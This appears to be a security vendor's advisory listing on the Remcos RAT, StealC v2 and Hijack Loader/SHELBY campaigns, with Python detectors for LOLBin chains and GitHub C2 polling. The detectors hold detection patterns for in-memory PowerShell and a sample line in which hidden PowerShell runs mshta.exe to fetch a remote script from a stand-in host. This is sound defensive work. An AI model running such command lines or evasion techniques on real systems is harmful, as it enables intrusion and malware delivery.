Security Advisories

Fileless, Fearless, and in Your Network – The 2025 Remcos RAT Surge

In May 2025, a stealthy malware campaign was identified delivering a fileless variant of the Remcos Remote Access Trojan (RAT) via malicious Windows Shortcut (LNK) files and PowerShell-based execution chains. The campaign exemplifies how attackers are increasingly bypassing traditional security controls by leveraging native Windows tools like <code>mshta.exe</code> to execute payloads directly in memory — leaving minimal forensic traces. Phishing emails, often themed around taxes, are used to lure victims into triggering the infection chain, ultimately granting attackers full remote access. This operation highlights a broader trend in cybercrime: the weaponisation of legitimate system components and fileless techniques to quietly establish persistent control, exfiltrate data, and evade detection. Remcos, once a commercial RAT, continues to evolve as a favoured tool in espionage, fraud, and credential theft — with this campaign marking a sharp escalation in its stealth and delivery. These developments reinforce the need for a defence-in-depth strategy. Relying solely on a single security vendor — especially Microsoft Defender, which is deeply integrated into Windows and frequently targeted by attackers — leaves organisations exposed to blind spots. Combining complementary detection layers, including network, behavioural, and memory-based analysis, is essential to identify and disrupt modern threats that bypass conventional, signature-based defences.…
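The chain described above (shortcut file, PowerShell, then mshta.exe pulling a script straight into memory) leaves little on disk, but it still produces process-creation telemetry. The following detection sketch is an added example for this listing, not code from the campaign write-up or from any vendor: it walks parent/child relationships in constructed Sysmon-style events (field names are an assumption) and alerts on a native script host launched with suspicious arguments either from the shell, which is how a double-clicked LNK starts its payload, or as part of a chain of two or more such hosts. The LOLBin list, the argument patterns and the sample events are the author's choices and contain no indicators taken from the advisory.

```python
"""Detect fileless LOLBin execution chains (LNK -> PowerShell -> mshta.exe)
in process-creation telemetry.

Added example for this advisory listing, not code from the campaign write-up.
Field names mirror Sysmon Event ID 1 / Windows 4688 (assumption); the events
below are constructed and contain no real indicators from the campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Native script hosts and proxies commonly abused for in-memory execution
# (selection is an assumption, not a list taken from the advisory).
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line traits that make a LOLBin launch worth a second look.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(enc|e|encodedcommand)\b", re.I), "encoded PowerShell"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory Invoke-Expression"),
    (re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I), "remote download"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\bhttps?://", re.I), "URL passed to a script host"),
    (re.compile(r"\b(vbscript|javascript):", re.I), "inline script protocol"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_reasons(ev: ProcEvent) -> list:
    """Return the suspicious-argument labels matched by a LOLBin launch."""
    if basename(ev.image) not in LOLBINS:
        return []
    return [why for rx, why in SUSPICIOUS_ARGS if rx.search(ev.cmdline)]


def ancestry(ev: ProcEvent, by_pid: dict, depth: int = 3) -> list:
    """Image basenames from the event up through `depth` ancestors."""
    names = [basename(ev.image)]
    cur = ev
    while cur.ppid in by_pid and len(names) <= depth:
        cur = by_pid[cur.ppid]
        names.append(basename(cur.image))
    return names


def find_chains(events: list) -> list:
    """Alert on a LOLBin with suspicious arguments that either sits in a
    chain of two or more LOLBins or was launched from the shell (explorer.exe),
    which is how a double-clicked LNK starts its payload."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        reasons = suspicious_reasons(ev)
        if not reasons:
            continue
        names = ancestry(ev, by_pid)
        lolbin_hops = sum(n in LOLBINS for n in names)
        if lolbin_hops >= 2 or "explorer.exe" in names:
            alerts.append({"pid": ev.pid,
                           "chain": " -> ".join(reversed(names)),
                           "reasons": reasons})
    return alerts


# Constructed telemetry: one LNK-style chain and one benign admin script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -nop -c "mshta.exe https://example.invalid/tax.hta"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/tax.hta"),
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(400, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(600, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for alert in find_chains(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, both the hidden PowerShell launched from explorer.exe and the mshta.exe it spawns are flagged, while the administrator's scheduled backup script (PowerShell under cmd.exe with no suspicious arguments) is not. The point of requiring both a suspicious argument and a chain or shell parent is to keep benign interactive PowerShell use out of the alert queue; tune the patterns to your environment rather than treating the list as complete.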
May 23, 2025

Silent, Modular, Dangerous: The Rise of StealC v2

StealC v2 marks a significant advancement in the evolution of modern information-stealing malware, now operating as both a stealer and a loader—engineered for stealth, modularity, and operational precision. First observed in early 2023 as a browser-focused credential harvester, StealC has rapidly evolved into a highly adaptable tool leveraged by cybercriminals across diverse campaigns. The latest version introduces notable enhancements, including advanced anti-analysis techniques, dynamic configuration logic, and staged data exfiltration routines. Its streamlined communication with command-and-control (C2) infrastructure enables fine-grained tasking, conditional payload delivery, and phased exfiltration—dramatically increasing its evasiveness and complexity in live environments. Critically, StealC v2 can delay activation of its stealer functionality until instructed by the C2, allowing attackers to run collection only when predefined conditions are met. This on-demand behaviour, coupled with its support for deploying further payloads after exfiltration, makes StealC v2 exceptionally difficult to detect with conventional signature- or behaviour-based security mechanisms, since a sandbox or analyst may never see the stealer component fire.
May 12, 2025

Hijack Loader and SHELBY Campaigns

In April 2025, cybersecurity researchers uncovered two advanced threats that highlight the growing sophistication of adversaries: an upgraded Hijack Loader variant and a newly discovered malware family named SHELBY (REF8685). Both demonstrate enhanced capabilities in evading detection, maintaining persistence, and misusing legitimate platforms. The Hijack Loader—also known as DOILoader, SHADOWLADDER, and GHOSTPULSE—has evolved to include call stack spoofing, direct system calls via Heaven’s Gate, and virtualisation-aware execution. These enhancements improve its ability to bypass sandboxes and endpoint protections while serving as a stealthy delivery mechanism for second-stage payloads such as Cobalt Strike. Meanwhile, SHELBY uses GitHub for Command-and-Control (C2) communications—a tactic designed to blend into legitimate network traffic, since requests to a code-hosting service rarely stand out to proxy or firewall rules. It uses a multi-stage chain with DLL side-loading and sandbox evasion to complicate detection and analysis. These threats reinforce the need for organisations to strengthen their detection strategies against stealthy loaders, abuse of legitimate services, and evasive malware behaviours.
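Because SHELBY's C2 traffic goes to GitHub, domain reputation alone will not catch it; what does stand out is the shape of the traffic. The following is an added example for this listing, not code from the SHELBY analysis or from any vendor: it groups requests to code-hosting domains by source, process and host in constructed proxy log lines (the log format, with a process column, is an assumed endpoint-aware proxy format) and flags a series of regular, low-jitter requests from a client that never presents a browser user agent. The host list, thresholds and sample lines are the author's assumptions and carry no SHELBY indicators.

```python
"""Spot C2-style polling of a legitimate hosting service (GitHub) in web
proxy logs by looking for regular, low-jitter requests from a non-browser
process.

Added example for this advisory listing, not code from the SHELBY analysis.
The log format (timestamp, source IP, process, method, URL, status, agent) is
an assumed endpoint-aware proxy format, and every line below is constructed.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Optional
from urllib.parse import urlparse

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) '
    r'(?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
# Legitimate hosts that are also used as dead drops or C2 relays (assumption).
WATCHED_HOSTS = {"github.com", "api.github.com",
                 "raw.githubusercontent.com", "gist.githubusercontent.com"}
BROWSER_UA = re.compile(r"Mozilla/|Chrome/|Firefox/|Edg/")


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["host"] = urlparse(rec["url"]).hostname or ""
    return rec


def find_beacons(lines, min_hits: int = 4, max_cv: float = 0.2) -> list:
    """Group watched-host requests by (source, process, host) and flag
    groups whose inter-request gaps are regular (coefficient of variation
    <= max_cv) and whose client never presents a browser user agent."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["host"] in WATCHED_HOSTS:
            groups[(rec["src"], rec["proc"], rec["host"])].append(rec)

    findings = []
    for (src, proc, host), recs in groups.items():
        if len(recs) < min_hits:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        browser = any(BROWSER_UA.search(r["ua"]) for r in recs)
        if cv <= max_cv and not browser:
            findings.append({"src": src, "process": proc, "host": host,
                             "hits": len(recs), "period_s": round(mean, 1),
                             "jitter_cv": round(cv, 3)})
    return findings


# Constructed log lines: a 60-second poller, a person browsing GitHub, a
# one-off git fetch too short to judge, and a request to an unwatched host.
SAMPLE_LOG = """\
2025-04-17T09:00:00 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:00:00 10.0.0.7 chrome.exe GET https://github.com/example-org/example-repo 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-04-17T09:00:13 10.0.0.7 chrome.exe GET https://github.com/example-org/example-repo/issues 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-04-17T09:01:00 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:02:01 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:02:30 10.0.0.7 chrome.exe GET https://github.com/example-org/example-repo/pulls 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-04-17T09:03:00 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:03:30 10.0.0.5 updater.exe GET https://example.invalid/ping 200 "WinHTTP-Client/1.0"
2025-04-17T09:04:02 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:05:00 10.0.0.5 updater.exe GET https://raw.githubusercontent.com/example-org/example-repo/main/tasks.txt 200 "WinHTTP-Client/1.0"
2025-04-17T09:06:40 10.0.0.7 chrome.exe GET https://github.com/example-org/example-repo/commits 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-04-17T09:07:01 10.0.0.7 chrome.exe GET https://github.com/example-org/example-repo/releases 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-04-17T09:10:00 10.0.0.9 git.exe GET https://github.com/example-org/example-repo/info/refs 200 "git/2.44.0"
2025-04-17T09:10:01 10.0.0.9 git.exe GET https://github.com/example-org/example-repo/info/refs 200 "git/2.44.0"
"""

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the constructed lines only the minute-by-minute poller from 10.0.0.5 is reported (six hits, 60 s period, jitter under 3%); the browsing session is both irregular and browser-identified, and the two git requests are too few to score. In production the same idea works on a sliding window, and the process column can be replaced by a JA3/JA4 fingerprint or client certificate where the proxy does not see the process name.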
April 17, 2025